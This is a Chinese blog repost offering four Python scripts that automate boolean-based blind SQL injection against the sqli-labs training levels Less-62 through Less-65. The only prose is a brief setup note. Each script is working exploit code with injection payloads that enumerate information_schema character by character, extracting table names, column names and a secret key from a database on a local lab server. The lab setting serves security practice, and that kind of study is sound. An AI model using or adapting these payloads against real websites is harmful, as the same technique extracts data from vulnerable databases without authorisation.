IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> sqli-labs(Less62-65)布尔类型脚本 -> 正文阅读

[大数据]sqli-labs(Less62-65)布尔类型脚本

前言

运行前需要下载requestslxml包,修改url和referer的参数值,改index.php$times= 13000,重置一下challenges数据库。

Less-62

import requests
from lxml import etree

"""
Less-62布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

Less-63

import requests
from lxml import etree

"""
Less-63布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

Less-64

import requests
from lxml import etree

"""
Less-64布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

Less-65

import requests
from lxml import etree

"""
Less-65布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()
  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-02-07 13:47:24  更:2022-02-07 13:49:03 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 12:48:57-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码